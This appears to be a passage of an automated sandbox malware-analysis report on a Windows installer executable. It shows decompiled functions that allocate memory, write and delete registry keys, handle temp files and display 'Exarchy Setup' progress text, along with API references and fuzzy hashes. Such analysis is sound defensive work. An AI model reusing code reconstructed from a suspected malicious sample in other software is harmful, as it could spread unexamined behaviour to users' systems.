									__edi = GlobalAlloc("true",  *0x1000405c +  *0x1000405c);
									 *0x1000405c = MultiByteToWideChar(0, 0, __ebp,  *0x1000405c, __edi,  *0x1000405c);
									if( *__esi != 5) {
										 *(__esi + 0x1c) = __edi;
										 *__ebx = __edi;
									} else {
										__eax = GlobalAlloc("true", "true");
										_push(__eax);
										 *(__esi + 0x1c) = __eax;
										_push(__edi);
										 *__ebx = __eax;
										__imp__CLSIDFromString();
										__eax = GlobalFree(__edi);
									}
									goto L27;
								case 5:
									if(lstrlenA(__ebp) > 0) {
										__eax = E100012FE(__ebp);
										 *__edi = __eax;
									}
									goto L27;
								case 6:
									__esi =  *(__esi + 0x18);
									__esi = __esi - 1;
									__esi = __esi *  *0x1000405c;
									__esi = __esi +  *0x10004064;
									__eax = __esi + 0xc;
									 *__edi = __esi + 0xc;
									asm("cdq");
									__eax = E10001429(__edx, __esi + 0xc, __edx, __esi);
									goto L27;
							}
						}
					}
					L9:
					_t36 = E10001224(0x10004034);
					goto L10;
				}
			}

0x1000220e
0x10002212
0x1000221d
0x1000221d
0x10002224
0x10002229
0x00000000
0x00000000
0x1000222d
0x10002230
0x00000000
0x00000000
0x10002235
0x10002240
0x10002250
0x10002247
0x10002249
0x1000225f
0x1000225f
0x00000000
0x10002237
0x10002237
0x10002260
0x10002264
0x10002266
0x10002266
0x10002269
0x10002269
0x10002271
0x10002273
0x1000227a
0x10002349
0x1000234a
0x10002355
0x1000237f
0x1000237f
0x10002365
0x10002371
0x10002367
0x10002367
0x10002367
0x00000000
0x10002280
0x10002280
0x00000000
0x10002287
0x00000000
0x00000000
0x10002290
0x00000000
0x00000000
0x1000229e
0x100022a0
0x00000000
0x00000000
0x100022a9
0x100022ae
0x100022b1
0x100022b2
0x00000000
0x00000000
0x100022be
0x100022c9
0x100022d8
0x100022e1
0x10002303
0x10002306
0x100022e3
0x100022e7
0x100022ed
0x100022ee
0x100022f1
0x100022f2
0x100022f4
0x100022fb
0x100022fb
0x00000000
0x00000000
0x10002313
0x10002316
0x10002322
0x10002324
0x00000000
0x00000000
0x10002327
0x1000232a
0x1000232b
0x10002332
0x10002339
0x1000233c
0x1000233e
0x10002341
0x00000000
0x00000000
0x10002280
0x1000227a
0x10002255
0x1000225a
0x00000000
0x1000225a

APIs

GlobalFree.KERNEL32(00000000), ref: 1000234A

Part of subcall function 10001224: lstrcpynA.KERNEL32(00000000,?,100012CF,-1000404B,100011AB,-000000A0), ref: 10001234

GlobalAlloc.KERNEL32(?,?), ref: 100022C3
MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 100022D8
GlobalAlloc.KERNEL32(?,?), ref: 100022E7
CLSIDFromString.OLE32(00000000,00000000), ref: 100022F4
GlobalFree.KERNEL32(00000000), ref: 100022FB

Memory Dump Source

Source File: 00000000.00000002.1046900983.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.1046873048.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1046935240.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1046965779.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_wLlREXsA9M.jbxd

Similarity

API ID: Global$AllocFree$ByteCharFromMultiStringWidelstrcpyn
String ID:
API String ID: 3730416702-0
Opcode ID: 8ca201b8c9dcbb45ad50e4cb45e4e1ae2e8a5d70f393ea2d6c63899163ff979d
Instruction ID: bfa8c22ebd78897ea4dc14f883c746723b208fa17a75ef0c69fbb79ff87ab60c
Opcode Fuzzy Hash: 8ca201b8c9dcbb45ad50e4cb45e4e1ae2e8a5d70f393ea2d6c63899163ff979d
Instruction Fuzzy Hash: B541ABB1108311EFF320DFA48884B5BB7F8FF443D1F218529F946D61A9DB34AA448B61

Uniqueness

Uniqueness Score: -1.00%

Function 100023DA Relevance: 10.6, APIs: 7, Instructions: 111
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E100023DA(intOrPtr* _a4) {
				char _v80;
				intOrPtr _v84;
				short _v92;
				intOrPtr* _t22;
				void* _t24;
				intOrPtr _t25;
				signed int _t33;
				void* _t37;
				intOrPtr _t38;
				void* _t41;

				_t37 = E10001215();
				_t22 = _a4;
				_t38 =  *((intOrPtr*)(_t22 + 0x814));
				_v84 = _t38;
				_t41 = (_t38 + 0x41 << 5) + _t22;
				do {
					if( *((intOrPtr*)(_t41 - 4)) != 0xffffffff) {
					}
					_t33 =  *(_t41 - 8);
					if(_t33 <= 7) {
						switch( *((intOrPtr*)(_t33 * 4 +  &M100024FD))) {
							case 0:
								 *_t37 = 0;
								goto L15;
							case 1:
								_push( *__eax);
								goto L13;
							case 2:
								__eax = E10001429(__edx,  *__eax,  *((intOrPtr*)(__eax + 4)), __edi);
								goto L14;
							case 3:
								__eax = lstrcpynA(__edi,  *__eax,  *0x1000405c);
								goto L15;
							case 4:
								__ecx =  *0x1000405c;
								__edx = __ecx - 1;
								__eax = WideCharToMultiByte(__ebx, __ebx,  *__eax, __ecx, __edi, __edx, __ebx, __ebx);
								__eax =  *0x1000405c;
								 *((char*)(__eax + __edi - 1)) = __bl;
								goto L15;
							case 5:
								__ecx =  &_v80;
								_push(0x27);
								_push( &_v80);
								_push( *__eax);
								__imp__StringFromGUID2();
								__eax =  &_v92;
								__eax = WideCharToMultiByte(__ebx, __ebx,  &_v92,  &_v92, __edi,  *0x1000405c, __ebx, __ebx);
								goto L15;
							case 6:
								_push( *__esi);
								L13:
								__eax = wsprintfA(__edi, 0x10004000);
								L14:
								__esp = __esp + 0xc;
								goto L15;
						}
					}
					L15:
					_t24 =  *(_t41 + 0x14);
					if(_t24 != 0 && ( *_a4 != 2 ||  *((intOrPtr*)(_t41 - 4)) > 0)) {
						GlobalFree(_t24);
					}
					_t25 =  *((intOrPtr*)(_t41 + 0xc));
					if(_t25 != 0) {
						if(_t25 != 0xffffffff) {
							if(_t25 > 0) {
								E100012D1(_t25 - 1, _t37);
								goto L24;
							}
						} else {
							E10001266(_t37);
							L24:
						}
					}
					_v84 = _v84 - 1;
					_t41 = _t41 - 0x20;
				} while (_v84 >= 0);
				return GlobalFree(_t37);
			}

0x100023e6
0x100023e8
0x100023f2
0x100023f8
0x10002402
0x10002406
0x1000240a
0x1000240a
0x10002412
0x10002418
0x1000241e
0x00000000
0x10002425
0x00000000
0x00000000
0x10002429
0x00000000
0x00000000
0x10002433
0x00000000
0x00000000
0x10002443
0x00000000
0x00000000
0x1000246f
0x10002477
0x10002481
0x10002483
0x10002488
0x00000000
0x00000000
0x1000244b
0x1000244f
0x10002451
0x10002452
0x10002454
0x10002464
0x1000246b
0x00000000
0x00000000
0x1000248e
0x10002490
0x10002496
0x1000249c
0x1000249c
0x00000000
0x00000000
0x1000241e
0x1000249f
0x1000249f
0x100024a4
0x100024b5
0x100024b5
0x100024bb
0x100024c0
0x100024c5
0x100024d1
0x100024d6
0x00000000
0x100024db
0x100024c7
0x100024c8
0x100024dc
0x100024dc
0x100024c5
0x100024dd
0x100024e1
0x100024e4
0x100024fc

APIs

Part of subcall function 10001215: GlobalAlloc.KERNELBASE(?,10001233,?,100012CF,-1000404B,100011AB,-000000A0), ref: 1000121D

GlobalFree.KERNEL32(?), ref: 100024B5
GlobalFree.KERNEL32(00000000), ref: 100024EF

Memory Dump Source

Source File: 00000000.00000002.1046900983.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.1046873048.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1046935240.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1046965779.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_wLlREXsA9M.jbxd

Similarity

API ID: Global$Free$Alloc
String ID:
API String ID: 1780285237-0
Opcode ID: 8ed12168559ed504bf2d16f5614b25cf9b7800a5843296302d7a865f42518c80
Instruction ID: 4e6b36a645f71e2aed4a85f2c36ff1861f2741140ba068ae73f9b0a79c1593cf
Opcode Fuzzy Hash: 8ed12168559ed504bf2d16f5614b25cf9b7800a5843296302d7a865f42518c80
Instruction Fuzzy Hash: EA319CB1504250EFF322CF64CCC4C6B7BBDEB852D4B124529FA4193168CB31AC94DB62

Uniqueness

Uniqueness Score: -1.00%

Function 00404871 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404871(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageA(_t28, 0x110c, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}

0x0040487f
0x0040488c
0x00404892
0x004048d0
0x004048d0
0x004048df
0x004048e6
0x00000000
0x004048e8
0x00404894
0x004048a3
0x004048ab
0x004048ae
0x004048c0
0x004048c6
0x004048cd
0x00000000
0x004048cd
0x00000000

APIs

SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 0040488C
GetMessagePos.USER32 ref: 00404894
ScreenToClient.USER32(?,?), ref: 004048AE
SendMessageA.USER32(?,00001111,00000000,?), ref: 004048C0
SendMessageA.USER32(?,0000110C,00000000,?), ref: 004048E6

Strings

f, xrefs: 004048C2

Memory Dump Source

Source File: 00000000.00000002.1030236900.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1030207147.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030289404.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030638407.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wLlREXsA9M.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: 13dcb630cae817d26763a7c5c34c1a537cec2b83c976c16d0abeb4614e4307e4
Instruction ID: 3e16708bf637c92610e68d99b48c059e059f0abcea2f04324816f7572ef0ef62
Opcode Fuzzy Hash: 13dcb630cae817d26763a7c5c34c1a537cec2b83c976c16d0abeb4614e4307e4
Instruction Fuzzy Hash: 17019275D00218BADB00EB94DC85BFEBBBCAF45711F10412BBA01B61C0C7B465018BA5

Uniqueness

Uniqueness Score: -1.00%

Function 00402C13 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40
timeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402C13(struct HWND__* _a4, intOrPtr _a8) {
				char _v68;
				int _t11;
				int _t20;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t20 =  *0x40a8b8; // 0x5d62d
					_t11 =  *0x4168c4; // 0x5e078
					if(_t20 >= _t11) {
						_t20 = _t11;
					}
					wsprintfA( &_v68, "verifying installer: %d%%", MulDiv(_t20, "true", _t11));
					SetWindowTextA(_a4,  &_v68);
					SetDlgItemTextA(_a4, 0x406,  &_v68);
				}
				return 0;
			}

0x00402c20
0x00402c2e
0x00402c34
0x00402c34
0x00402c42
0x00402c44
0x00402c4a
0x00402c51
0x00402c53
0x00402c53
0x00402c69
0x00402c79
0x00402c8b
0x00402c8b
0x00402c93

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402C2E
MulDiv.KERNEL32(0005D62D,?,0005E078), ref: 00402C59
wsprintfA.USER32 ref: 00402C69
SetWindowTextA.USER32(?,?), ref: 00402C79
SetDlgItemTextA.USER32(?,00000406,?), ref: 00402C8B

Strings

verifying installer: %d%%, xrefs: 00402C63

Memory Dump Source

Source File: 00000000.00000002.1030236900.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1030207147.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030289404.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030638407.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wLlREXsA9M.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: e3a9d0d3ea10fd8f54f4be059d1f3bf25cfb27a141286b2464fe21b0e9fea73e
Instruction ID: 82e3c7ecf88430e4efffd05d758b281883e1390192f951285504ed7d58bf76b5
Opcode Fuzzy Hash: e3a9d0d3ea10fd8f54f4be059d1f3bf25cfb27a141286b2464fe21b0e9fea73e
Instruction Fuzzy Hash: 9C016270544208BBEF209F60DD09EEE37A9EB04344F008039FA06B52D0D7B89955CF59

Uniqueness

Uniqueness Score: -1.00%

Function 00402779 Relevance: 9.1, APIs: 6, Instructions: 72memoryfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00405A00: GetFileAttributesA.KERNELBASE(00000003,00402D3A,C:\Users\user\Desktop\wLlREXsA9M.exe,80000000,00000003), ref: 00405A04
Part of subcall function 00405A00: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405A26

GlobalAlloc.KERNEL32(?,?), ref: 0040279D
CloseHandle.KERNEL32(?), ref: 0040281D

Part of subcall function 00403125: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402EC1,?), ref: 00403133

GlobalAlloc.KERNEL32(?,?,00000000,?), ref: 004027B9
GlobalFree.KERNEL32(?), ref: 004027F2
GlobalFree.KERNEL32(00000000), ref: 00402805

Part of subcall function 00402F33: GetTickCount.KERNEL32 ref: 00402F91
Part of subcall function 00402F33: GetTickCount.KERNEL32 ref: 00403012
Part of subcall function 00402F33: MulDiv.KERNEL32(7FFFFFFF,?,00000020), ref: 0040303F
Part of subcall function 00402F33: wsprintfA.USER32 ref: 0040304F

DeleteFileA.KERNEL32(?), ref: 00402831

Memory Dump Source

Source File: 00000000.00000002.1030236900.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1030207147.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030289404.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030638407.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wLlREXsA9M.jbxd

Similarity

API ID: FileGlobal$AllocCountFreeTick$AttributesCloseCreateDeleteHandlePointerwsprintf
String ID:
API String ID: 2082585436-0
Opcode ID: 73b6b8f34ac26a09f21aef18a7c4b39732c11d3bbb5886e427834912e6d94ccb
Instruction ID: 40d5f135b7b166b68c7d7f85174102e02a12e29e7b5d138e82026addb792a26f
Opcode Fuzzy Hash: 73b6b8f34ac26a09f21aef18a7c4b39732c11d3bbb5886e427834912e6d94ccb
Instruction Fuzzy Hash: F2219D72C04128BBCF11AFA5CE88DAEBE79EF08320B14423AF515762E0C6794D41DB99

Uniqueness

Uniqueness Score: -1.00%

Function 00404767 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84
stringCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E00404767(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
				char _v36;
				char _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t21;
				signed int _t22;
				void* _t29;
				void* _t31;
				void* _t32;
				void* _t41;
				signed int _t43;
				signed int _t47;
				signed int _t50;
				signed int _t51;
				signed int _t53;

				_t21 = _a16;
				_t51 = _a12;
				_push("true");
				_pop(_t41);
				if(_t21 == 0) {
					0 = "true";
					_t22 = _t51;
					if(_t51 < 0x100000) {
						_push(0xa);
						_pop(0);
						_t41 = 0xffffffdd;
					}
					if(_t51 < 0x400) {
						_t41 = 0xffffffde;
					}
					if(_t51 < 0xffff3333) {
						_push("true");
						_pop(_t50);
						asm("cdq");
						_t22 = 1 / _t50 + _t51;
					}
					_t23 = _t22 & 0x00ffffff;
					_t53 = _t22 >> 0;
					_t43 = 0xa;
					_t47 = ((_t22 & 0x00ffffff) + _t23 * 4 + (_t22 & 0x00ffffff) + _t23 * 4 >> 0) % _t43;
				} else {
					_t53 = (_t21 << 0x00000020 | _t51) >> 0x14;
					_t47 = 0;
				}
				_t29 = E00405DAF(_t41, _t47, _t53,  &_v36, 0xffffffdf);
				_t31 = E00405DAF(_t41, _t47, _t53,  &_v68, _t41);
				_t32 = E00405DAF(_t41, _t47, 0x41fd08, 0x41fd08, _a8);
				wsprintfA(_t32 + lstrlenA(0x41fd08), "%u.%u%s%s", _t53, _t47, _t31, _t29);
				return SetDlgItemTextA( *0x422ed8, _a4, 0x41fd08);
			}

0x0040476d
0x00404772
0x00404776
0x0040477a
0x0040477b
0x00404790
0x00404791
0x00404793
0x00404795
0x00404797
0x0040479a
0x0040479a
0x004047a1
0x004047a7
0x004047a7
0x004047ae
0x004047b2
0x004047b5
0x004047b8
0x004047bb
0x004047bb
0x004047bf
0x004047cf
0x004047d1
0x004047d4
0x0040477d
0x0040477d
0x00404784
0x00404784
0x004047dc
0x004047e7
0x004047fd
0x0040480d
0x00404829

APIs

lstrlenA.KERNEL32(Exarchy Setup: Installing,Exarchy Setup: Installing,?,%u.%u%s%s,00000005,00000000,00000000,?,?,00000000,00404682,000000DF,00000000,00000400,?), ref: 00404805
wsprintfA.USER32 ref: 0040480D
SetDlgItemTextA.USER32(?,Exarchy Setup: Installing), ref: 00404820

Strings

%u.%u%s%s, xrefs: 004047EF
Exarchy Setup: Installing, xrefs: 004047F7, 004047FC, 00404802, 00404816

Memory Dump Source

Source File: 00000000.00000002.1030236900.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1030207147.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030289404.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030638407.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wLlREXsA9M.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s$Exarchy Setup: Installing
API String ID: 3540041739-603146192
Opcode ID: a9110c8c0b4632058317aeb0bafa8e6dc1786fcf085c81ee1a61e2019cbc3bf7
Instruction ID: f00a9a42396921a69e7ac38b10658c8527a2016de7537b6c7c384d6a5a5905c6
Opcode Fuzzy Hash: a9110c8c0b4632058317aeb0bafa8e6dc1786fcf085c81ee1a61e2019cbc3bf7
Instruction Fuzzy Hash: 6511B773A041243BDB0066699C45EAF3298DF86374F294237FA26F31D1EA788C1285A9

Uniqueness

Uniqueness Score: -1.00%

Function 004023D3 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73
registrystringCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E004023D3(void* __eax, intOrPtr __edx, void* __eflags) {
				void* _t16;
				char* _t19;
				int _t20;
				int _t28;
				intOrPtr _t34;
				intOrPtr _t38;
				void* _t40;

				_t34 = __edx;
				_t16 = E00402BC3(__eax);
				_t38 =  *((intOrPtr*)(_t40 - 0x18));
				 *(_t40 - 0x38) =  *(_t40 - 0x14);
				 *(_t40 - 0x54) = E00402ACE(2);
				_t19 = E00402ACE(0x11);
				 *(_t40 - 4) = 1;
				_t20 = RegCreateKeyExA(_t16, _t19, _t28, _t28, _t28,  *0x4237b0 | 0x00000002, _t28, _t40 + 8, _t28);
				if(_t20 == 0) {
					if(_t38 == 1) {
						E00402ACE(0x23);
						_t20 = lstrlenA(0x409be8) + 1;
					}
					if(_t38 == 4) {
						 *0x409be8 = E00402AAC(3);
						 *((intOrPtr*)(_t40 - 0x64)) = _t34;
						_t20 = _t38;
					}
					if(_t38 == 3) {
						_t20 = E00402F33( *((intOrPtr*)(_t40 - 0x1c)), _t28, 0x409be8, 0xc00);
					}
					if(RegSetValueExA( *(_t40 + 8),  *(_t40 - 0x54), _t28,  *(_t40 - 0x38), 0x409be8, _t20) == 0) {
						 *(_t40 - 4) = _t28;
					}
					_push( *(_t40 + 8));
					RegCloseKey();
				}
				 *0x423788 =  *0x423788 +  *(_t40 - 4);
				return 0;
			}

0x004023d3
0x004023d4
0x004023d9
0x004023e3
0x004023ed
0x004023f0
0x0040240a
0x00402411
0x00402419
0x00402427
0x0040242b
0x00402436
0x00402436
0x0040243a
0x00402444
0x0040244a
0x0040244d
0x0040244d
0x00402451
0x0040245d
0x0040245d
0x00402476
0x00402478
0x00402478
0x0040247b
0x0040254f
0x0040254f
0x00402961
0x0040296d

APIs

RegCreateKeyExA.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402411
lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nssF823.tmp,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 00402431
RegSetValueExA.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nssF823.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040246E
RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nssF823.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040254F

Strings

C:\Users\user\AppData\Local\Temp\nssF823.tmp, xrefs: 00402422, 00402444, 00402458, 00402463

Memory Dump Source

Source File: 00000000.00000002.1030236900.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1030207147.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030289404.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030638407.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wLlREXsA9M.jbxd

Similarity

API ID: CloseCreateValuelstrlen
String ID: C:\Users\user\AppData\Local\Temp\nssF823.tmp
API String ID: 1356686001-1755549536
Opcode ID: 964ee6a6e91342bc391cefb68e0e0063b818e3cfa024402d3c5c39647d7fc5c4
Instruction ID: 0ed12c2c628768d71f30ba177879b06493d830c92c3ee7cf6f2abb7bfd4c89b9
Opcode Fuzzy Hash: 964ee6a6e91342bc391cefb68e0e0063b818e3cfa024402d3c5c39647d7fc5c4
Instruction Fuzzy Hash: 722181B1E00109BEEB10EFA4DE49EAF7A79EB54358F20403AF505B61D0C6B95D419B29

Uniqueness

Uniqueness Score: -1.00%

Function 00402B0E Relevance: 7.6, APIs: 5, Instructions: 67
registryCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E00402B0E(void* _a4, char* _a8, intOrPtr _a12) {
				void* _v8;
				char _v272;
				long _t18;
				intOrPtr* _t27;
				long _t28;

				_t18 = RegOpenKeyExA(_a4, _a8, 0,  *0x4237b0 | 0x00000008,  &_v8);
				if(_t18 == 0) {
					while(RegEnumKeyA(_v8, 0,  &_v272, 0x105) == 0) {
						if(_a12 != 0) {
							RegCloseKey(_v8);
							L8:
							return 1;
						}
						if(E00402B0E(_v8,  &_v272, 0) != 0) {
							break;
						}
					}
					RegCloseKey(_v8);
					_t27 = E00406126(3);
					if(_t27 == 0) {
						if( *0x4237b0 != 0) {
							goto L8;
						}
						_t28 = RegDeleteKeyA(_a4, _a8);
						if(_t28 != 0) {
							goto L8;
						}
						return _t28;
					}
					return  *_t27(_a4, _a8,  *0x4237b0, 0);
				}
				return _t18;
			}

0x00402b2f
0x00402b37
0x00402b5f
0x00402b49
0x00402b99
0x00402b9f
0x00000000
0x00402ba1
0x00402b5d
0x00000000
0x00000000
0x00402b5d
0x00402b74
0x00402b7c
0x00402b83
0x00402baf
0x00000000
0x00000000
0x00402bb7
0x00402bbf
0x00000000
0x00000000
0x00000000
0x00402bbf
0x00000000
0x00402b92
0x00402ba6

APIs

RegOpenKeyExA.ADVAPI32(?,?,00000000,?,?), ref: 00402B2F
RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402B6B
RegCloseKey.ADVAPI32(?), ref: 00402B74
RegCloseKey.ADVAPI32(?), ref: 00402B99
RegDeleteKeyA.ADVAPI32(?,?), ref: 00402BB7

Memory Dump Source

Source File: 00000000.00000002.1030236900.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1030207147.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030289404.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030638407.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wLlREXsA9M.jbxd

Similarity

API ID: Close$DeleteEnumOpen
String ID:
API String ID: 1912718029-0
Opcode ID: 26d703e6b955c0b1753e13e50ef068aceb5afa025d50a3e8e2eadb28cc0acf60
Instruction ID: 584d5248f8c52ff2931f54fcb8e64a837f320eff9aeb4af8048f1852d9d811ad
Opcode Fuzzy Hash: 26d703e6b955c0b1753e13e50ef068aceb5afa025d50a3e8e2eadb28cc0acf60
Instruction Fuzzy Hash: B0118E71900109FFDF11AF90DE89EAA3B7EFB44345B004076FA05F10A0D378AE51AB69

Uniqueness

Uniqueness Score: -1.00%

Function 00401D95 Relevance: 7.5, APIs: 5, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E00401D95(intOrPtr __edx) {
				void* __esi;
				int _t9;
				signed char _t15;
				struct HFONT__* _t18;
				intOrPtr _t30;
				struct HDC__* _t31;
				void* _t33;
				void* _t35;

				_t30 = __edx;
				_t31 = GetDC( *(_t35 - 8));
				_t9 = E00402AAC(2);
				 *((intOrPtr*)(_t35 - 0x38)) = _t30;
